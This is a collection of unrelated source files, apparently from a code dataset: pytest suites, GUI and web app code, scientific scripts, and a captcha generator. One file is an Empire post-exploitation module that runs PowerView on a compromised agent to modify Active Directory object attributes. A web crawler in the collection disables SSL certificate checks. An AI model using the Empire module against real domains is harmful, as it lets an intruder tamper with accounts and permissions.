from stateCensusAnalyser import CSVStateCensus, SortData, Mapping
from custom_exceptions import ( FileIsNotCSVTypeException,
EmptyFileException,
InvalidDelimiterException)
sort_ref = SortData()
map_ref = Mapping()
class TestCensus:
def test_State_census_records_to_match_number_of_records_UC1_TC1(self):
obj = CSVStateCensus("IndiaStateCensusData.csv")
total_records = obj.number_of_records(obj.load_CSV)
assert total_records == 28
def test_file_not_in_csv_format_will_raise_FileIsNotCSVTypeException_UC1_TC2(self):
with pytest.raises(FileIsNotCSVTypeException):
obj = CSVStateCensus("demo_empty.txt")
obj.load_CSV
def test_file_is_csv_but_empty_will_raise_EmptyFileException_UC1_TC3(self):
with pytest.raises(EmptyFileException):
obj = CSVStateCensus("demo_empty.csv")
obj.load_CSV
def test_file_is_csv_but_delimiter_is_invalid_will_raise_InvalidDelimiterException_UC1_TC4(self):
with pytest.raises(InvalidDelimiterException):
obj = CSVStateCensus('csv_with_invalid_delimiter.csv')
obj.load_CSV
def test_file_is_csv_but_header_is_invalid_will_return_InvalidHeader_UC1_TC5(self):
obj = CSVStateCensus("csv_with_invalid_header.csv")
assert obj.load_CSV == "InvalidHeader"
def test_State_code_records_to_match_number_of_records_UC2_TC1(self):
obj = CSVStateCensus("StateCode.csv")
total_records = obj.number_of_records(obj.load_CSV)
assert total_records == 36
def test_IndiaStateCensus_first_state_after_sorting_in_JSON_will_be_Andhra_Pradesh_UC3(self):
data_frame = sort_ref._SortData__sort_InidaCensusData_in_alphabetical_order_in_JSON()
assert data_frame[0]["State"] == 'Andhra Pradesh'
def test_IndiaStateCensus_last_state_after_sorting_in_JSON_will_be_West_Bengal_UC3(self):
data_frame = sort_ref._SortData__sort_InidaCensusData_in_alphabetical_order_in_JSON()
assert data_frame[28]["State"] == 'West Bengal'
def test_StateCode_first_stateCode_after_sorting_in_JSON_will_be_AD_UC4(self):
data_frame = sort_ref._SortData__sort_StateCode_in_stateCode_order_in_JSON()
assert data_frame[0]["StateCode"] == 'AD'
def test_StateCode_last_stateCode_after_sorting_in_JSON_will_be_WB_UC4(self):
data_frame = sort_ref._SortData__sort_StateCode_in_stateCode_order_in_JSON()
assert data_frame.pop()["StateCode"] == 'WB'
def test_after_sort_according_to_population_check_first_record_will_be_Sikkim_UC5(self):
data = sort_ref._SortData__sort_InidaCensusData_in_asc_population_order_in_JSON()
assert data[0]["State"] == "Sikkim"
def test_after_sort_according_to_population_check_last_record_will_be_Uttar_Pradesh_UC5(self):
data = sort_ref._SortData__sort_InidaCensusData_in_asc_population_order_in_JSON()
assert data.pop()["State"] == "Uttar Pradesh"
def test_after_sort_according_to_populationDensity_check_first_record_will_be_Arunachal_Pradesh_UC6(self):
data = sort_ref._SortData__sort_InidaCensusData_in_asc_population_density_order_in_JSON()
assert data[0]["State"] == "Arunachal Pradesh"
def test_after_sort_according_to_populationDensity_check_last_record_will_be_Bihar_UC6(self):
data = sort_ref._SortData__sort_InidaCensusData_in_asc_population_density_order_in_JSON()
assert data.pop()["State"] == "Bihar"
def test_mapping_by_checking_first_record_will_be_AP_REFACTOR6(self):
data = map_ref._Mapping__map_state_census_with_state_code_according_to_code()
assert data[0]["StateCode"] == 'AP'
def test_mapping_by_checking_last_record_will_be_WB_REFACTOR6(self):
data = map_ref._Mapping__map_state_census_with_state_code_according_to_code()
assert data.pop()["StateCode"] == 'WB'
def test_first_state_from_census_data_after_sorting_in_desc_area_order_will_return_Rajasthan_UC7(self):
data = sort_ref._SortData__sort_InidaCensusData_in_desc_area_order_in_JSON()
assert data[0]["State"] == "Rajasthan"
def test_last_state_from_census_data_after_sorting_in_desc_area_order_will_return_Goa_UC7(self):
data = sort_ref._SortData__sort_InidaCensusData_in_desc_area_order_in_JSON()
assert data.pop()["State"] == "Goa"
|
[
"kalaskars1996@gmail.com"
] |
kalaskars1996@gmail.com
|
0c80371e2bfa26e44298ef6ee0467de3c1f87c35
|
d697c1d45e96bd440be9c17ab14243a5882b1f52
|
/qianfeng/常用模块/Tkinter/Button.py
|
b271d275b4103dc54132277c710592fefe06f946
|
[] |
no_license
|
ithjl521/python
|
9eeda2e60dda97ee36e8764c06400eb12818689f
|
f4fe50799501c483cb64445fd05ee0f30f56576c
|
refs/heads/master
| 2020-07-12T23:10:53.608276
| 2019-11-08T08:59:35
| 2019-11-08T08:59:35
| 204,931,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 334
|
py
|
import tkinter
def fun():
print('hello word')
win = tkinter.Tk()
win.title('title-hjl')
win.geometry("400x400+200+50")
# 创建按钮
button = tkinter.Button(win,
text='按钮',
command=fun,
width=10,
height=10)
button.pack()
button2 = tkinter.Button(win,
text='按钮',
command=win.quit)
button2.pack()
win.mainloop()
|
[
"it_hjl@163.com"
] |
it_hjl@163.com
|
ff5da7da6b07126320c3f20bf185a5bb97f29a76
|
45edff14271724c5bf27e62e96eeb635840eae22
|
/DeepLearning/tensorflow/10-1验证码生成.py
|
088f13b02cdcbe8d829ad08df6367e5e7919adc9
|
[] |
no_license
|
DaiJitao/machine_learning
|
1e41208dc94836a97e57a4b0f5778f8da2bb81d4
|
49e1db9ecbfbf886a11ce416eea402d214cf2049
|
refs/heads/master
| 2021-06-25T23:52:06.066315
| 2021-02-07T16:17:50
| 2021-02-07T16:17:50
| 209,712,507
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,595
|
py
|
# coding: utf-8
# In[1]:
# 验证码生成库
from captcha.image import ImageCaptcha # pip install captcha
import numpy as np
from PIL import Image
import random
import sys
from DeepLearning.utils import mkdir
number = ['0','1','2','3','4','5','6','7','8','9']
# alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
# ALPHABET = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
def random_captcha_text(char_set=number, captcha_size=4):
# 验证码列表
captcha_text = []
for i in range(captcha_size):
#随机选择
c = random.choice(char_set)
#加入验证码列表
captcha_text.append(c)
return captcha_text
# 生成字符对应的验证码
def gen_captcha_text_and_image(out_path='E:/data/captcha/images/'):
image = ImageCaptcha()
#获得随机生成的验证码
captcha_text = random_captcha_text()
#把验证码列表转为字符串
captcha_text = ''.join(captcha_text)
#生成验证码
captcha = image.generate(captcha_text)
mkdir(out_path)
image.write(captcha_text, out_path + captcha_text + '.jpg') # 写到文件
#数量少于10000,因为重名
num = 10000
if __name__ == '__main__':
for i in range(num):
gen_captcha_text_and_image()
sys.stdout.write('\r>> Creating image %d/%d' % (i+1, num))
sys.stdout.flush()
sys.stdout.write('\n')
sys.stdout.flush()
print("生成完毕")
# In[ ]:
# In[ ]:
|
[
"976185561@qq.com"
] |
976185561@qq.com
|
ea796738c0ea8c09243d2bef06d9183481be9d08
|
d2f7471c1429f1ca454bb4cc982bbbecc31f8160
|
/app/conf/wsgi.py
|
9cc41bf59a4f0f8c847660a80aebaaa9ea5625f6
|
[
"MIT"
] |
permissive
|
HenriqueLR/hangman-game
|
1e442735f688c4e0b2ada6f2208360a01e0df353
|
6cb29ae1ab666af0d6b054b2e1d598ebb5ff8db3
|
refs/heads/master
| 2021-08-22T03:39:08.156486
| 2017-11-29T05:08:56
| 2017-11-29T05:08:56
| 108,403,950
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
"""
WSGI config for app project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "conf.settings_production")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
[
"henrique.lr89@gmail.com"
] |
henrique.lr89@gmail.com
|
baaea832d2de21fc9bdca57ef60c88bc7b43cf92
|
df2cbe914f463ad050d7ed26194424afbe3a0a52
|
/addons/website_sale/models/product_image.py
|
eea9afb69671067f39780fa6041a4031d9e785e0
|
[
"Apache-2.0"
] |
permissive
|
SHIVJITH/Odoo_Machine_Test
|
019ed339e995be980606a2d87a63312ddc18e706
|
310497a9872db7844b521e6dab5f7a9f61d365a4
|
refs/heads/main
| 2023-07-16T16:23:14.300656
| 2021-08-29T11:48:36
| 2021-08-29T11:48:36
| 401,010,175
| 0
| 0
|
Apache-2.0
| 2021-08-29T10:13:58
| 2021-08-29T10:13:58
| null |
UTF-8
|
Python
| false
| false
| 2,699
|
py
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models, tools, _
from odoo.exceptions import ValidationError
from odoo.addons.website.tools import get_video_embed_code
class ProductImage(models.Model):
_name = 'product.image'
_description = "Product Image"
_inherit = ['image.mixin']
_order = 'sequence, id'
name = fields.Char("Name", required=True)
sequence = fields.Integer(default=10, index=True)
image_1920 = fields.Image(required=True)
product_tmpl_id = fields.Many2one('product.template', "Product Template", index=True, ondelete='cascade')
product_variant_id = fields.Many2one('product.product', "Product Variant", index=True, ondelete='cascade')
video_url = fields.Char('Video URL',
help='URL of a video for showcasing your product.')
embed_code = fields.Char(compute="_compute_embed_code")
can_image_1024_be_zoomed = fields.Boolean("Can Image 1024 be zoomed", compute='_compute_can_image_1024_be_zoomed', store=True)
@api.depends('image_1920', 'image_1024')
def _compute_can_image_1024_be_zoomed(self):
for image in self:
image.can_image_1024_be_zoomed = image.image_1920 and tools.is_image_size_above(image.image_1920, image.image_1024)
@api.depends('video_url')
def _compute_embed_code(self):
for image in self:
image.embed_code = get_video_embed_code(image.video_url)
@api.constrains('video_url')
def _check_valid_video_url(self):
for image in self:
if image.video_url and not image.embed_code:
raise ValidationError(_("Provided video URL for '%s' is not valid. Please enter a valid video URL.", image.name))
@api.model_create_multi
def create(self, vals_list):
"""
We don't want the default_product_tmpl_id from the context
to be applied if we have a product_variant_id set to avoid
having the variant images to show also as template images.
But we want it if we don't have a product_variant_id set.
"""
context_without_template = self.with_context({k: v for k, v in self.env.context.items() if k != 'default_product_tmpl_id'})
normal_vals = []
variant_vals_list = []
for vals in vals_list:
if vals.get('product_variant_id') and 'default_product_tmpl_id' in self.env.context:
variant_vals_list.append(vals)
else:
normal_vals.append(vals)
return super().create(normal_vals) + super(ProductImage, context_without_template).create(variant_vals_list)
|
[
"36736117+SHIVJITH@users.noreply.github.com"
] |
36736117+SHIVJITH@users.noreply.github.com
|
c227bd7e8a5d2110d0ff22a4bd3d177ce65344de
|
d8db486c6c0e4f7c4da3dd9d8752a2de0174a1d6
|
/test/apiv2/rest_api/v1_test_rest_v1_0_0.py
|
acd6273ef57d7afcf195aca5cd60f67e8b9c27dd
|
[
"Apache-2.0"
] |
permissive
|
isabella232/podman
|
49c10ca0df99bbc4362b8ec284b43bf05c38cca8
|
dcd498a6885f0293934214af0c6fc2d3c7717bd5
|
refs/heads/master
| 2023-03-07T23:36:51.958197
| 2020-11-18T15:59:41
| 2020-11-18T15:59:41
| 314,002,564
| 0
| 0
|
Apache-2.0
| 2021-02-23T16:35:32
| 2020-11-18T17:06:49
| null |
UTF-8
|
Python
| false
| false
| 7,662
|
py
|
import json
import os
import shlex
import signal
import string
import subprocess
import sys
import time
import unittest
from collections.abc import Iterable
from multiprocessing import Process
import requests
from dateutil.parser import parse
PODMAN_URL = "http://localhost:8080"
def _url(path):
return PODMAN_URL + "/v1.0.0/libpod" + path
def podman():
binary = os.getenv("PODMAN_BINARY")
if binary is None:
binary = "bin/podman"
return binary
def ctnr(path):
r = requests.get(_url("/containers/json?all=true"))
try:
ctnrs = json.loads(r.text)
except Exception as e:
sys.stderr.write("Bad container response: {}/{}".format(r.text, e))
raise e
return path.format(ctnrs[0]["Id"])
class TestApi(unittest.TestCase):
podman = None
def setUp(self):
super().setUp()
if TestApi.podman.poll() is not None:
sys.stderr.write("podman service returned {}", TestApi.podman.returncode)
sys.exit(2)
requests.get(_url("/images/create?fromSrc=docker.io%2Falpine%3Alatest"))
# calling out to podman is easier than the API for running a container
subprocess.run(
[podman(), "run", "alpine", "/bin/ls"],
check=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
@classmethod
def setUpClass(cls):
super().setUpClass()
TestApi.podman = subprocess.Popen(
[
podman(),
"system",
"service",
"tcp:localhost:8080",
"--log-level=debug",
"--time=0",
],
shell=False,
stdin=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
time.sleep(2)
@classmethod
def tearDownClass(cls):
TestApi.podman.terminate()
stdout, stderr = TestApi.podman.communicate(timeout=0.5)
if stdout:
print("\nService Stdout:\n" + stdout.decode("utf-8"))
if stderr:
print("\nService Stderr:\n" + stderr.decode("utf-8"))
if TestApi.podman.returncode > 0:
sys.stderr.write(
"podman exited with error code {}\n".format(TestApi.podman.returncode)
)
sys.exit(2)
return super().tearDownClass()
def test_info(self):
r = requests.get(_url("/info"))
self.assertEqual(r.status_code, 200)
self.assertIsNotNone(r.content)
_ = json.loads(r.text)
def test_events(self):
r = requests.get(_url("/events?stream=false"))
self.assertEqual(r.status_code, 200, r.text)
self.assertIsNotNone(r.content)
for line in r.text.splitlines():
obj = json.loads(line)
# Actor.ID is uppercase for compatibility
_ = obj["Actor"]["ID"]
def test_containers(self):
r = requests.get(_url("/containers/json"), timeout=5)
self.assertEqual(r.status_code, 200, r.text)
obj = json.loads(r.text)
self.assertEqual(len(obj), 0)
def test_containers_all(self):
r = requests.get(_url("/containers/json?all=true"))
self.assertEqual(r.status_code, 200, r.text)
self.validateObjectFields(r.text)
def test_inspect_container(self):
r = requests.get(_url(ctnr("/containers/{}/json")))
self.assertEqual(r.status_code, 200, r.text)
obj = self.validateObjectFields(r.content)
_ = parse(obj["Created"])
def test_stats(self):
r = requests.get(_url(ctnr("/containers/{}/stats?stream=false")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
self.validateObjectFields(r.text)
def test_delete_containers(self):
r = requests.delete(_url(ctnr("/containers/{}")))
self.assertEqual(r.status_code, 204, r.text)
def test_stop_containers(self):
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_start_containers(self):
r = requests.post(_url(ctnr("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_restart_containers(self):
r = requests.post(_url(ctnr("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(_url(ctnr("/containers/{}/restart")), timeout=5)
self.assertEqual(r.status_code, 204, r.text)
def test_resize(self):
r = requests.post(_url(ctnr("/containers/{}/resize?h=43&w=80")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
self.assertIsNone(r.text)
def test_attach_containers(self):
r = requests.post(_url(ctnr("/containers/{}/attach")))
self.assertIn(r.status_code, (101, 409), r.text)
def test_logs_containers(self):
r = requests.get(_url(ctnr("/containers/{}/logs?stdout=true")))
self.assertEqual(r.status_code, 200, r.text)
def test_post_create(self):
self.skipTest("TODO: create request body")
r = requests.post(_url("/containers/create?args=True"))
self.assertEqual(r.status_code, 200, r.text)
json.loads(r.text)
def test_commit(self):
r = requests.post(_url(ctnr("/commit?container={}")))
self.assertEqual(r.status_code, 200, r.text)
self.validateObjectFields(r.text)
def test_images(self):
r = requests.get(_url("/images/json"))
self.assertEqual(r.status_code, 200, r.text)
self.validateObjectFields(r.content)
def test_inspect_image(self):
r = requests.get(_url("/images/alpine/json"))
self.assertEqual(r.status_code, 200, r.text)
obj = self.validateObjectFields(r.content)
_ = parse(obj["Created"])
def test_delete_image(self):
r = requests.delete(_url("/images/alpine?force=true"))
self.assertEqual(r.status_code, 200, r.text)
json.loads(r.text)
def test_pull(self):
r = requests.post(_url("/images/pull?reference=alpine"), timeout=5)
self.assertEqual(r.status_code, 200, r.text)
json.loads(r.text)
def test_search(self):
# Had issues with this test hanging when repositories not happy
def do_search():
r = requests.get(_url("/images/search?term=alpine"), timeout=5)
self.assertEqual(r.status_code, 200, r.text)
json.loads(r.text)
search = Process(target=do_search)
search.start()
search.join(timeout=10)
self.assertFalse(search.is_alive(), "/images/search took too long")
def test_ping(self):
r = requests.get(PODMAN_URL + "/_ping")
self.assertEqual(r.status_code, 200, r.text)
r = requests.head(PODMAN_URL + "/_ping")
self.assertEqual(r.status_code, 200, r.text)
r = requests.get(_url("/_ping"))
self.assertEqual(r.status_code, 200, r.text)
r = requests.get(_url("/_ping"))
self.assertEqual(r.status_code, 200, r.text)
def validateObjectFields(self, buffer):
objs = json.loads(buffer)
if not isinstance(objs, dict):
for o in objs:
_ = o["Id"]
else:
_ = objs["Id"]
return objs
if __name__ == "__main__":
unittest.main()
|
[
"jhonce@redhat.com"
] |
jhonce@redhat.com
|
e4d23a56aa95cac0d11bf916aabdb1ea0d1d364c
|
4dd1d8fa59e20061e2c12e540fc52b1b305e575b
|
/source/sims/s286/double-harris-ic.py
|
ba4ee31039abd673c146d855b94be5ecfb63344d
|
[
"MIT"
] |
permissive
|
ammarhakim/ammar-simjournal
|
f63521906a97d55ab290a5960d94758139944c89
|
5019f4723e20db80a20db6f2bd454c2fd3241412
|
refs/heads/master
| 2023-06-08T08:18:11.722779
| 2023-06-02T15:06:43
| 2023-06-02T15:06:43
| 204,050,516
| 3
| 3
| null | 2022-02-01T16:53:13
| 2019-08-23T18:28:44
|
Lua
|
UTF-8
|
Python
| false
| false
| 1,554
|
py
|
from pylab import *
import numpy
Lx = 100.0
Ly = 50.0
NX = 200
NY = 100
B0 = 0.1
me = 1.0
mi = me*25.0
qe = -1.0
qi = 1.0
dlambda = 1.0
n0 = 1.0
ninf = 0.2*n0
psi0 = B0
dx = Lx/NX
dy = Ly/NY
X = linspace(0.5*dx, Lx-0.5*dx, NX)
Y = linspace(0.5*dy, Ly-0.5*dy, NY)
XX, YY = meshgrid(X, Y)
Bx = numpy.zeros((NX, NY), numpy.float)
n = numpy.zeros((NX, NY), numpy.float)
dBx1 = numpy.zeros((NX, NY), numpy.float)
dBy1 = numpy.zeros((NX, NY), numpy.float)
dBx2 = numpy.zeros((NX, NY), numpy.float)
dBy2 = numpy.zeros((NX, NY), numpy.float)
for i in range(NX):
for j in range(NY):
Bx[i,j] = B0*(-1+tanh((Y[j]-Ly/4)/dlambda)-tanh((Y[j]-3*Ly/4)/dlambda))
n[i,j] = n0/cosh((Y[j]-Ly/4)/dlambda)**2+n0/cosh((Y[j]-3*Ly/4)/dlambda)**2+ninf
dBx1[i,j] = -psi0*(pi/Ly)*cos(2*pi*(X[i]-Lx/4)/Lx)*sin(pi*(Y[j]-Ly/4)/Ly)
dBy1[i,j] = psi0*(2*pi/Lx)*sin(2*pi*(X[i]-Lx/4)/Lx)*cos(pi*(Y[j]-Ly/4)/Ly)
dBx2[i,j] = -psi0*(pi/Ly)*cos(2*pi*(X[i]+Lx/4)/Lx)*sin(pi*(Y[j]+Ly/4)/Ly)
dBy2[i,j] = psi0*(2*pi/Lx)*sin(2*pi*(X[i]+Lx/4)/Lx)*cos(pi*(Y[j]+Ly/4)/Ly)
figure(1)
pcolormesh(XX, YY, transpose(Bx))
title('Bx(x,y)')
colorbar()
figure(2)
pcolormesh(XX, YY, transpose(n))
title('n(x,y)')
colorbar()
figure(3)
plot(Y, Bx[NX/2,:], 'r-')
xlabel('Y')
ylabel('Bx')
title('Bx(y)')
figure(4)
plot(Y, n[NX/2,:], 'r-')
xlabel('Y')
ylabel('n')
title('n(y)')
figure(7)
Bxt = Bx+dBx1+dBx2
Byt = dBy1+dBy2
Btot = sqrt(Bxt**2+Byt**2)
#contour(XX, YY, transpose(Btot))
streamplot(X, Y, transpose(Bxt), transpose(Byt), density=2)
show()
|
[
"11265732+ammarhakim@users.noreply.github.com"
] |
11265732+ammarhakim@users.noreply.github.com
|
f1f6ea249402b6419fc6f324019956dc69813c50
|
69633bcb719e5caa2859c30d38f0fb0ff33b05a7
|
/app/api/urls.py
|
8ab6b71db340bc097ea2d0ae7dd19e923cae9533
|
[] |
no_license
|
Zarinabonu/employee_version_2
|
e0ed3df43633241774686b7eaba01fbf2bebfa1a
|
991d8fce23d3736df0271c3ca3e380a13ab6e5c0
|
refs/heads/master
| 2022-11-26T03:22:47.067982
| 2019-12-07T08:14:36
| 2019-12-07T08:14:36
| 223,534,726
| 0
| 0
| null | 2022-11-22T04:50:39
| 2019-11-23T05:12:50
|
Python
|
UTF-8
|
Python
| false
| false
| 498
|
py
|
from django.urls import include, path
urlpatterns = [
path('group/', include('app.api.group.urls')),
path('employee/', include('app.api.employee.urls')),
path('salary/', include('app.api.salary.urls')),
path('accountant/', include('app.api.accountant.urls')),
path('attendance/', include('app.api.attendance.urls')),
path('project/', include('app.api.project.urls')),
path('task/', include('app.api.task.urls')),
path('static/', include('app.api.static.urls')),
]
|
[
"zarinabonu199924@gmail.com"
] |
zarinabonu199924@gmail.com
|
deda7c2da31cde83eeb0a317505f79f8db6fb75e
|
326c6ad82d59bb7509c02c76695ea9035993da70
|
/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py
|
2a0e745b9ae829fc42345a0a3330e60ab4217790
|
[
"BSD-3-Clause"
] |
permissive
|
Arvanaghi/Empire
|
0c08bd7ddfba9be10e96bb0834b8ce3bc829059b
|
fd168ebf8acb1c2ee59d56f2c393ebd7a297603e
|
refs/heads/master
| 2021-01-20T14:15:34.864581
| 2017-08-05T17:51:44
| 2017-08-05T17:51:44
| 99,435,848
| 2
| 0
| null | 2017-08-05T16:50:16
| 2017-08-05T16:50:16
| null |
UTF-8
|
Python
| false
| false
| 4,526
|
py
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Set-ADObject',
'Author': ['@harmj0y'],
'Description': ('Takes a SID, name, or SamAccountName to query for a specified '
'domain object, and then sets a specified "PropertyName" to a '
'specified "PropertyValue". Part of PowerView.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'SID' : {
'Description' : "The SID of the domain object you're querying for.",
'Required' : False,
'Value' : ''
},
'Name' : {
'Description' : "The name of the domain object you're querying for.",
'Required' : False,
'Value' : ''
},
'SamAccountName' : {
'Description' : "The SamAccountName of the domain object you're querying for",
'Required' : False,
'Value' : ''
},
'Domain' : {
'Description' : 'The domain to query for objects, defaults to the current domain.',
'Required' : False,
'Value' : ''
},
'PropertyName' : {
'Description' : 'The property name to set.',
'Required' : False,
'Value' : ''
},
'PropertyValue' : {
'Description' : 'The value to set for PropertyName.',
'Required' : False,
'Value' : ''
},
'PropertyXorValue' : {
'Description' : 'Integer calue to binary xor (-bxor) with the current int value.',
'Required' : False,
'Value' : ''
},
'ClearValue' : {
'Description' : 'Switch. Clear the value of PropertyName.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
return script
|
[
"will@harmj0y.net"
] |
will@harmj0y.net
|
b988547aeade1c42cfea0da062e3ba6a62e711c9
|
c2fb6846d5b932928854cfd194d95c79c723f04c
|
/python/coursera_python/MICHIGAN/wikicrawler/fin5.py
|
6ca16eb862d2f226ef4bed731e6432b820b1b03d
|
[
"MIT"
] |
permissive
|
Jimut123/code-backup
|
ef90ccec9fb6483bb6dae0aa6a1f1cc2b8802d59
|
8d4c16b9e960d352a7775786ea60290b29b30143
|
refs/heads/master
| 2022-12-07T04:10:59.604922
| 2021-04-28T10:22:19
| 2021-04-28T10:22:19
| 156,666,404
| 9
| 5
|
MIT
| 2022-12-02T20:27:22
| 2018-11-08T07:22:48
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,200
|
py
|
# To run this, you can install BeautifulSoup
# https://pypi.python.org/pypi/beautifulsoup4
# Or download the file
# http://www.py4e.com/code3/bs4.zip
# and unzip it in the same directory as this file
import sqlite3
conn = sqlite3.connect('wiki1.sqlite')
cur = conn.cursor()
cur.executescript('''
CREATE TABLE IF NOT EXISTS data (
id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
link TEXT UNIQUE
);
''')
import urllib.request, urllib.parse, urllib.error
from bs4 import BeautifulSoup
import ssl
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url='0'
dummy = 1
next_url = '0'
i=10
#######
print("i = ",i)
while(1):
i=i+1
##########
print("i = ",i)
if dummy == 1:
url = input('Enter - ')
#######
print("url entered = ",url)
print("dummy = ",dummy)
if dummy == 0:
#######
print("dummy = ",dummy)
url = next_url
#######
print("url = ",url)
html = urllib.request.urlopen(url, context=ctx).read()
soup = BeautifulSoup(html, 'html.parser')
# Retrieve all of the anchor tags
tags = soup('a')
######
print(tags)
for tag in tags:
dummy3=0
while dummy3==0:
######
print("dummy3 = ",dummy3)
dummy3=1
try:
######
link_get = tag.get('href', None)
dummy3=1
#######
print("link_get = ",link_get)
print("dummy3 = ",1)
except ValueError:
link_get = cur.execute(''' SELECT link FROM data where id = ?''',(i,))
#######
print("link_get = ",link_get)
i=i-1
#######
print("i = ",i)
#html = urllib.request.urlopen(url, context=ctx).read()
#soup = BeautifulSoup(html, 'html.parser')
#tags = soup('a')
#i=i+1
########
print(link_get)
while(link_get == None):
########
print(link_get)
if link_get == None:
i=i-1
link_get = cur.execute(''' SELECT link FROM data where id = ?''',(i,))
#####
print("Entered here !! safe !!")
print(link_get)
while 'https:' not in link_get:
try :
if 'https:' in link_get:
print(link_get," no https: protocol changing mode");
except ValueError:
link_get = cur.execute(''' SELECT link FROM data where id = ?''',(i,))
print("link_get = ",link_get)
i=i-1
print("i = ",i)
if 'https:' in link_get:
i=i+1
print("link_get = ",link_get,"i = ",i )
if 'https:' in link_get:
next_url = link_get
print("next_url = ", next_url)
k=0
while k==0:
i=i-1
print("i = ",i)
try:
url = next_url
print("next_url : ",next_url)
print("url : ",url)
html = urllib.request.urlopen(url, context=ctx).read()
print(html)
soup = BeautifulSoup(html, 'html.parser')
print(soup)
tags = soup('a')
print(tags)
k=1
except:
url = cur.execute(''' SELECT link FROM data where id = ?''',(i,))
print(next_url," == is not valid")
print("====================================")
cur.execute('''INSERT OR IGNORE INTO data (link)
VALUES ( ? )''', ( link_get, ) )
#i=150
if(i%10 == 0):
conn.commit()
dummy = 0
conn.commit()
|
[
"jimutbahanpal@yahoo.com"
] |
jimutbahanpal@yahoo.com
|
fa8309731559f5f28c23907d10d8809df78cf6ea
|
7142c3941481e661075154d714a29d5e283a3074
|
/KeywordArguments.py
|
7238526401ef054445d4af584ad76d295e46f26a
|
[] |
no_license
|
nirajan5/Demo
|
5642a9669fedcca47b0304ac423c0b3e6333b8e2
|
2451875bf5698cd38af69baa117c14099951bc9f
|
refs/heads/master
| 2023-07-27T17:04:03.689673
| 2021-09-15T11:14:25
| 2021-09-15T11:14:25
| 406,732,005
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 279
|
py
|
# function func is called with the name and message as the keyword arguments
def func(name, message):
print("printing the message with", name, "and ", message)
# name and message is copied with the values Mike and hello respectively
func(name="Mike", message="hello")
|
[
"jhanirajan5@gmail.com"
] |
jhanirajan5@gmail.com
|
baf79214692455db57861792b2f1ca24f8f899e9
|
7d8022661a756f77f715ee4d099fb17cb9da671a
|
/feature/zoo/Skewness_Daily.py
|
65ff2a7ce6ebc641dccfe4e1a9bbef343ece64da
|
[] |
no_license
|
lxj0276/Quant-Util
|
a7d70d88fc47eb16a08149faefa7b128c01c670e
|
2706ecba72a293ee01105ad22508a8d6b20e1394
|
refs/heads/master
| 2020-04-25T13:40:36.700892
| 2018-10-15T04:35:54
| 2018-10-15T04:35:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 609
|
py
|
from feature.base import NonPersistentFeature
from feature.ops import *
from feature.zoo.ChangeRate_Daily import ChangeRate_Daily
class Skewness_Daily(NonPersistentFeature):
description = '个股历史22日收益率的偏度'
formula = 'Skewness = E[(R)^3], R=(r-mu)/sigma '
granularity = 'day'
def _create_feature(self, instrument_id, time_range):
def get_skewness(x):
neu_x = ((x - nanmean(x)) / nanstd(x)) ** 3
return nanmean(neu_x)
skewness = Rolling(ChangeRate_Daily(), 22, get_skewness)
return skewness.load(instrument_id, time_range)
|
[
"zhangzc@pku.edu.cn"
] |
zhangzc@pku.edu.cn
|
42d4e14bfa94bd62f6a98bae988d6c52e6d4f11d
|
